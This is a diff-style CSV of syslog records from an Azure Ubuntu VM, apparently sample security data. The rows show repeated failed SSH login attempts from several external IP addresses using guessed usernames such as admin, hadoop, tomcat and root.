+592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:24,UbuntuDevEnv,2019-06-26 17:54:24,auth,UbuntuDevEnv,info,Invalid user admin from 157.230.190.1 port 54308,56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,54308,,
+593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:24,UbuntuDevEnv,2019-06-26 17:54:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:24,UbuntuDevEnv,2019-06-26 17:54:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:26,UbuntuDevEnv,2019-06-26 17:54:25,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 157.230.190.1 port 54308 ssh2,56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,54308,,
+596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:26,UbuntuDevEnv,2019-06-26 17:54:25,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 157.230.190.1 port 54308 [preauth],56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.190.1,54308,,
+597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:26,UbuntuDevEnv,2019-06-26 17:54:25,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 54308:11: Bye Bye [preauth],56115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,54308,,
+598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:32,UbuntuDevEnv,2019-06-26 17:54:32,auth,UbuntuDevEnv,info,Invalid user websphere from 54.37.66.73 port 55040,56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,54.37.66.7,55040,,
+599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:32,UbuntuDevEnv,2019-06-26 17:54:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:32,UbuntuDevEnv,2019-06-26 17:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:34,UbuntuDevEnv,2019-06-26 17:54:34,auth,UbuntuDevEnv,info,Failed password for invalid user websphere from 54.37.66.73 port 55040 ssh2,56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,54.37.66.7,55040,,
+602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:34,UbuntuDevEnv,2019-06-26 17:54:34,auth,UbuntuDevEnv,info,Disconnected from invalid user websphere 54.37.66.73 port 55040 [preauth],56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,54.37.66.7,55040,,
+603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:34,UbuntuDevEnv,2019-06-26 17:54:34,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 55040:11: Bye Bye [preauth],56160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,55040,,
+604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:46,UbuntuDevEnv,2019-06-26 17:54:45,auth,UbuntuDevEnv,info,Connection closed by 111.61.107.113 port 55659 [preauth],56202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.61.107.1,55659,,
+605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:07,UbuntuDevEnv,2019-06-26 17:55:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:07,UbuntuDevEnv,2019-06-26 17:55:07,auth,UbuntuDevEnv,info,Invalid user xbmc from 58.87.109.107 port 14110,56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbmc,58.87.109.1,14110,,
+607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:07,UbuntuDevEnv,2019-06-26 17:55:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:09,UbuntuDevEnv,2019-06-26 17:55:08,auth,UbuntuDevEnv,info,Failed password for invalid user xbmc from 58.87.109.107 port 14110 ssh2,56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbmc,58.87.109.1,14110,,
+609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:09,UbuntuDevEnv,2019-06-26 17:55:09,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 14110:11: Bye Bye [preauth],56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,14110,,
+610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:09,UbuntuDevEnv,2019-06-26 17:55:09,auth,UbuntuDevEnv,info,Disconnected from invalid user xbmc 58.87.109.107 port 14110 [preauth],56258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbmc,58.87.109.1,14110,,
+611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:58,UbuntuDevEnv,2019-06-26 17:55:57,auth,UbuntuDevEnv,info,Invalid user hadoop from 54.37.66.73 port 35416,56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,54.37.66.7,35416,,
+612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:58,UbuntuDevEnv,2019-06-26 17:55:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:55:58,UbuntuDevEnv,2019-06-26 17:55:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:00,UbuntuDevEnv,2019-06-26 17:55:59,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 54.37.66.73 port 35416 ssh2,56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,54.37.66.7,35416,,
+615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:00,UbuntuDevEnv,2019-06-26 17:55:59,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 54.37.66.73 port 35416 [preauth],56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,54.37.66.7,35416,,
+616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:00,UbuntuDevEnv,2019-06-26 17:55:59,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 35416:11: Bye Bye [preauth],56455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,35416,,
+617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:07,UbuntuDevEnv,2019-06-26 17:56:07,auth,UbuntuDevEnv,info,Invalid user safety from 157.230.190.1 port 42642,56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,safety,157.230.190.1,42642,,
+618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:07,UbuntuDevEnv,2019-06-26 17:56:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:07,UbuntuDevEnv,2019-06-26 17:56:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:10,UbuntuDevEnv,2019-06-26 17:56:09,auth,UbuntuDevEnv,info,Failed password for invalid user safety from 157.230.190.1 port 42642 ssh2,56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,safety,157.230.190.1,42642,,
+621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:10,UbuntuDevEnv,2019-06-26 17:56:09,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 42642:11: Bye Bye [preauth],56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,42642,,
+622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:10,UbuntuDevEnv,2019-06-26 17:56:09,auth,UbuntuDevEnv,info,Disconnected from invalid user safety 157.230.190.1 port 42642 [preauth],56497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,safety,157.230.190.1,42642,,
+623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:34,UbuntuDevEnv,2019-06-26 17:56:34,auth,UbuntuDevEnv,info,Invalid user mc2 from 58.87.109.107 port 29796,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc2,58.87.109.1,29796,,
+624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:34,UbuntuDevEnv,2019-06-26 17:56:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:34,UbuntuDevEnv,2019-06-26 17:56:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:36,UbuntuDevEnv,2019-06-26 17:56:35,auth,UbuntuDevEnv,info,Failed password for invalid user mc2 from 58.87.109.107 port 29796 ssh2,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc2,58.87.109.1,29796,,
+627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:37,UbuntuDevEnv,2019-06-26 17:56:37,auth,UbuntuDevEnv,info,Disconnected from invalid user mc2 58.87.109.107 port 29796 [preauth],56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc2,58.87.109.1,29796,,
+628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:37,UbuntuDevEnv,2019-06-26 17:56:37,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 29796:11: Bye Bye [preauth],56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,29796,,
+629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:40,UbuntuDevEnv,2019-06-26 17:56:39,auth,UbuntuDevEnv,info,Invalid user tomcat from 107.175.127.237 port 47534,56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,107.175.127.2,47534,,
+630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:40,UbuntuDevEnv,2019-06-26 17:56:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:40,UbuntuDevEnv,2019-06-26 17:56:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:42,UbuntuDevEnv,2019-06-26 17:56:42,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 107.175.127.237 port 47534 ssh2,56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,107.175.127.2,47534,,
+633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:42,UbuntuDevEnv,2019-06-26 17:56:42,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 47534:11: Bye Bye [preauth],56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,47534,,
+634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:56:42,UbuntuDevEnv,2019-06-26 17:56:42,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 107.175.127.237 port 47534 [preauth],56610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,107.175.127.2,47534,,
+635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:27,UbuntuDevEnv,2019-06-26 17:57:27,auth,UbuntuDevEnv,info,Invalid user song from 54.37.66.73 port 44013,56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,54.37.66.7,44013,,
+636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:27,UbuntuDevEnv,2019-06-26 17:57:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:27,UbuntuDevEnv,2019-06-26 17:57:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:30,UbuntuDevEnv,2019-06-26 17:57:29,auth,UbuntuDevEnv,info,Failed password for invalid user song from 54.37.66.73 port 44013 ssh2,56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,54.37.66.7,44013,,
+639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:30,UbuntuDevEnv,2019-06-26 17:57:29,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 44013:11: Bye Bye [preauth],56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,44013,,
+640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:30,UbuntuDevEnv,2019-06-26 17:57:29,auth,UbuntuDevEnv,info,Disconnected from invalid user song 54.37.66.73 port 44013 [preauth],56783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,54.37.66.7,44013,,
+641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:40,UbuntuDevEnv,2019-06-26 17:57:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=36.66.188.183  user=root,56828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,36.66.188.1,,0,
+642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:42,UbuntuDevEnv,2019-06-26 17:57:42,auth,UbuntuDevEnv,info,Failed password for root from 36.66.188.183 port 46876 ssh2,56828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,36.66.188.1,46876,,
+643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:42,UbuntuDevEnv,2019-06-26 17:57:42,auth,UbuntuDevEnv,info,"Received disconnect from 36.66.188.183 port 46876:11: Normal Shutdown, Thank you for playing [preauth]",56828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,36.66.188.1,46876,,
+644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:42,UbuntuDevEnv,2019-06-26 17:57:42,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 36.66.188.183 port 46876 [preauth],56828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,36.66.188.1,46876,,
+645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:54,UbuntuDevEnv,2019-06-26 17:57:53,auth,UbuntuDevEnv,info,Invalid user postgres from 157.230.190.1 port 59212,56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,157.230.190.1,59212,,
+646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:54,UbuntuDevEnv,2019-06-26 17:57:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:54,UbuntuDevEnv,2019-06-26 17:57:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:56,UbuntuDevEnv,2019-06-26 17:57:56,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 157.230.190.1 port 59212 ssh2,56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,157.230.190.1,59212,,
+649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:56,UbuntuDevEnv,2019-06-26 17:57:56,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 157.230.190.1 port 59212 [preauth],56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,157.230.190.1,59212,,
+650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:57:56,UbuntuDevEnv,2019-06-26 17:57:56,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 59212:11: Bye Bye [preauth],56877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,59212,,
+651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:58:04,UbuntuDevEnv,2019-06-26 17:58:04,auth,UbuntuDevEnv,info,Invalid user maxwell from 58.87.109.107 port 45538,56917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,58.87.109.1,45538,,
